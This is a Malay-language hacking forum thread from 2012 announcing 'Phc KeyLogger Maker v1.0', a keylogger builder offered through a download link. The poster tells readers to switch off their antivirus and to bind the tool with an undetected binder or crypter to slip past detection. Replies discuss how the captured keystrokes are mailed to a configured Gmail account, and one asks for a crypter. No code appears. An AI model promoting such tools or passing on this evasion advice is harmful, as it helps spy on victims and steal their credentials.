Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Release]Phc KeyLogger Maker v1.0
16-10-2012, 10:35 PM, (This post was last modified: 17-10-2012, 12:23 AM by NoEntryPhc.)
Post: #1
Wink  [Release]Phc KeyLogger Maker v1.0
Assalamualaikum ...semalam baru je post tentang tool adminpagefinder dan hari ni nk post tentang keyloggermaker buatan PhcTeam tapi keyloggermaker ni detect dengan antivirus so untuk kasi undetect kena la bind dgn binder atau crypter yang undetect(susah nak cari sekarang ni).Jika anda rasa tool ni ade virus jadi janganlah download Big Grin . Aku bukan creator tool ini .. tapi member team aku .

Source:- Forum hacker luar Big Grin

P/s::- Tutup dulu antivirus anda ..

Banyak gak function dalam tool ni:-

[Image: 408734_353592008067413_1501471160_n.jpg]

Image depan:-
[Image: 545767_353572008069413_346284062_n.jpg]

Berminat dengan tool nih ?? Boleh download di link bawah ni:-

Download Link:- http://www.mediafire.com/?33ww7cy1yyll050
Result:- https://www.virustotal.com/file/a6a0ad8e...350397275/

Credits:- PhcTeam Fuck That Shit
Rencah dunia kita xkan tau siapa KAWAN dan LAWAN sehingga sampai
saat kita jatuh tersungkuh adakah tangan yang akan dihulurkan atau ditinggalkan ? Kih3
Reply
16-10-2012, 10:54 PM,
Post: #2
RE: [Release]Phc KeyLogger Maker v1.0
tima kasih......cmaner mana nak blaja vb sampai terrer....please guide me....apa forum terbaik yang ada byak maklumat tentang vb
Angry

sharing your knowledge to grow your knowledge...

and the knowledge is life not death
Reply
16-10-2012, 11:38 PM,
Post: #3
RE: [Release]Phc KeyLogger Maker v1.0
virus nya nakal tak ;d
Jangan disebabkan ‪#‎Cingey‬ ia menjadi batu yang menghalang untuk kita terus ke depan...
boss
Reply
16-10-2012, 11:40 PM,
Post: #4
RE: [Release]Phc KeyLogger Maker v1.0
(16-10-2012, 11:38 PM)AceyrafRoshlanz Wrote: virus nya nakal tak ;d

tak nakal pon .. boss
Rencah dunia kita xkan tau siapa KAWAN dan LAWAN sehingga sampai
saat kita jatuh tersungkuh adakah tangan yang akan dihulurkan atau ditinggalkan ? Kih3
Reply
16-10-2012, 11:41 PM,
Post: #5
RE: [Release]Phc KeyLogger Maker v1.0
smart, tapi buat sendiri ke nie ? sbb skrng nie snng je nk buat soft sendiri, ambik source code orng, tukar nama, siap... ;d
[Image: OmDM2yf.png]
Reply
16-10-2012, 11:42 PM,
Post: #6
RE: [Release]Phc KeyLogger Maker v1.0
(16-10-2012, 11:40 PM)NoEntryPhc Wrote:
(16-10-2012, 11:38 PM)AceyrafRoshlanz Wrote: virus nya nakal tak ;d

tak nakal pon .. boss

ok~ sedut dulu =b
nanti release kan crypter pulak;b
Jangan disebabkan ‪#‎Cingey‬ ia menjadi batu yang menghalang untuk kita terus ke depan...
boss
Reply
16-10-2012, 11:47 PM,
Post: #7
RE: [Release]Phc KeyLogger Maker v1.0
mcm mane fungsi diye ni? leh tau x??

diye log/record guna txt file pada folder temp atau apa ni?
Reply
16-10-2012, 11:56 PM, (This post was last modified: 16-10-2012, 11:59 PM by NoEntryPhc.)
Post: #8
RE: [Release]Phc KeyLogger Maker v1.0
(16-10-2012, 11:47 PM)hexrut Wrote: mcm mane fungsi diye ni? leh tau x??

diye log/record guna txt file pada folder temp atau apa ni?

aku buakn creator tool ni .. tp team aku yg create .. aku tukang promote Big Grin
log antar ke gmail yg telah kau setkan ..
Rencah dunia kita xkan tau siapa KAWAN dan LAWAN sehingga sampai
saat kita jatuh tersungkuh adakah tangan yang akan dihulurkan atau ditinggalkan ? Kih3
Reply
16-10-2012, 11:56 PM,
Post: #9
RE: [Release]Phc KeyLogger Maker v1.0
(16-10-2012, 11:41 PM)shahril Wrote: smart, tapi buat sendiri ke nie ? sbb skrng nie snng je nk buat soft sendiri, ambik source code orng, tukar nama, siap... ;d

Troll Face kerja senang dan mudah...
Reply
17-10-2012, 12:00 AM,
Post: #10
RE: [Release]Phc KeyLogger Maker v1.0
(16-10-2012, 11:56 PM)NoEntryPhc Wrote:
(16-10-2012, 11:47 PM)hexrut Wrote: mcm mane fungsi diye ni? leh tau x??

diye log/record guna txt file pada folder temp atau apa ni?

log antar ke gmail ..

macam mane ko tau log hantar ke gmail?
kalau aku set hexrut@tbd.my +smtp tbd.my xkan sampai kt gmail jugak? boss

maksud soalan yg diatas,
keylogger ni diye record setiap key yg ditekan dan untuk sementara waktu sebelum tiba masa yg ditetapkan untuk dihantar ke email yang di tetapkan , kat mana diye simpan log tu.. Hmm
xkan la diye simpan kt GMAIL kot Troll 2
Reply
17-10-2012, 12:17 AM,
Post: #11
RE: [Release]Phc KeyLogger Maker v1.0
ak rasa dia smpan kt tmpat org yg buat ni ;d
Reply
17-10-2012, 01:49 AM,
Post: #12
RE: [Release]Phc KeyLogger Maker v1.0
(16-10-2012, 11:41 PM)shahril Wrote: smart, tapi buat sendiri ke nie ? sbb skrng nie snng je nk buat soft sendiri, ambik source code orng, tukar nama, siap... ;d

senang tol nk cari nama skng nih GayFace
Reply
17-10-2012, 02:50 AM,
Post: #13
RE: [Release]Phc KeyLogger Maker v1.0
(17-10-2012, 01:49 AM)b3nt0s Wrote:
(16-10-2012, 11:41 PM)shahril Wrote: smart, tapi buat sendiri ke nie ? sbb skrng nie snng je nk buat soft sendiri, ambik source code orng, tukar nama, siap... ;d

senang tol nk cari nama skng nih GayFace

ape yg cari nama ?? Rage 2
Rencah dunia kita xkan tau siapa KAWAN dan LAWAN sehingga sampai
saat kita jatuh tersungkuh adakah tangan yang akan dihulurkan atau ditinggalkan ? Kih3
Reply
17-10-2012, 03:18 AM,
Post: #14
RE: [Release]Phc KeyLogger Maker v1.0
@[NoEntryPhc] kau akan jadi power satu hari nanti.. bagi sama taraf dengan @[XshimeX].. remember me? Abang Superuser
Reply
17-10-2012, 08:25 AM,
Post: #15
RE: [Release]Phc KeyLogger Maker v1.0
(17-10-2012, 03:18 AM)ahmadfikrizaman Wrote: @[NoEntryPhc] kau akan jadi power satu hari nanti.. bagi sama taraf dengan @[XshimeX].. remember me? Abang Superuser

yep aku setuju jugak, tapi bergantung kepada beliau sendiri, samada nak bergerak naik ke atas bumi, dan lihat orang sekeliling atau kekal dibawah tanah bersama kelompok sendiri

// lari jauh ni tajuk, sape off-topic lg aku kasi warn 10% boss
puas sudah menanam ubi, nenas juga dibeli orang, puas sudah aku berbakti, pengganas juga dipandang orang

Quote:A true warrior need blood on his sword; A true pirate never afraid to sail the red sea.
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  [Release] MultiPoster Facebook MyTeam 8 891 14-02-2014, 12:54 PM
Last Post: linear
Rainbow [Release] [Update #1] Oh! Yellow Pages v2.1 hexrut 38 3,829 31-10-2013, 10:03 PM
Last Post: gTraX
Rainbow [Release] Oh! Yellow Pages hexrut 28 6,722 03-07-2013, 07:23 PM
Last Post: hexrut
  [Release]AdminPageScanner NoEntryPhc 18 2,164 16-10-2012, 08:36 PM
Last Post: sykess
Rainbow [Release] xRut Downloader hexrut 13 2,716 21-01-2011, 05:08 PM
Last Post: D3vil
  Noobish Logger/Keylogger Paling Bodoh/Paling Xpower :D D3vil 31 5,107 04-05-2010, 02:44 AM
Last Post: D3vil
  My FUD Keylogger, GigaLogger v2.0... shakree42 35 7,086 02-05-2010, 07:11 PM
Last Post: shakree42
  [Request]Keylogger Spreader ! akiraro 16 3,447 05-04-2010, 10:36 AM
Last Post: D3vil
  [Request]Crypter And Keylogger akiraro 0 515 10-03-2010, 04:58 PM
Last Post: akiraro
  [VB.Net][SRC] Keylogger + PHP fatah 0 1,754 02-03-2010, 12:55 PM
Last Post: fatah

Forum Jump: